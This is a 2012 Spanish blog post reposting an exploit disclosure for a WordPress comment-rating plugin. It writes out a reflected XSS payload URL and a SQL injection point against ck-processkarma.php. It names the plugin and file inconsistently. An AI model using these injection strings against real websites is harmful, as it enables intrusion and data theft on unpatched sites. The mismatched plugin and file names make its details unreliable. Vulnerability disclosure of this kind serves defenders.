#ElPerúQueQueremos

Vulnerabilidad en WordPress ‘Ranking Comment’ Sql y XSS Injection

FidelServ I "Vive Libre, Sé Libre...Usa Software Libre"
Publicado: 2012-07-30

Un Xploit permite explotar distintas vulnerabilidades, no reparadas, en el plugin ‘Ranking Comment‘ para WordPress.

Los links para explotar dichas vulnerabilidades son:

/wp-content/plugins/comment-rating

/ck-prosesskarma.php?id=

La primer URL es para Cross site scripting (Xss) que nos permite inyectar codigo javascript y la segunda es  una vulnerabilidad de SQL Injection.

EL archivo vulnerable es ck-processkarma.php y las inyecciones son:

Xss

http://www.webVulnerable.com/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]&action=add&path=<script>alert('Founded by TheEvilThinker')</script>&imgIndex=

SQL injection

http://www.webVulnerable.com/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]*****Inject_me_From_Here*****&action=add&path=TheMilkeyWay.exe/wp-content/plugins/comment-rating/&imgIndex=

El archivo original fue extraído de: Pastebin y el Autor es: The Evil Thinker

Escrito por

FidelServ

Tecnico en Computacion e Infomatica, me gusta la investigacion y muchas ganas de aprender cosas nuevas.

Publicado en

&quot;Vive Libre, Sé Libre...Usa Software Libre&quot;

Promoviendo Info en Tocache-Perú 2012

Comunidad

FidelServ

Tecnico en Computacion e Infomatica, me gusta la investigacion y muchas ganas de aprender cosas nuevas.

¡Tú también puedes publicar!
Esta es una plataforma abierta.
Cualquier persona puede crearse un blog y escribir libremente.
No necesitas ningún permiso.
Ninguna autorización.

Publicar

La mula es una plataforma de periodismo fundada en junio de 2009. Contamos con más de 1.000.000 millón de seguidores y un equipo editorial que publica las historias y noticias que influyen en tu día a día.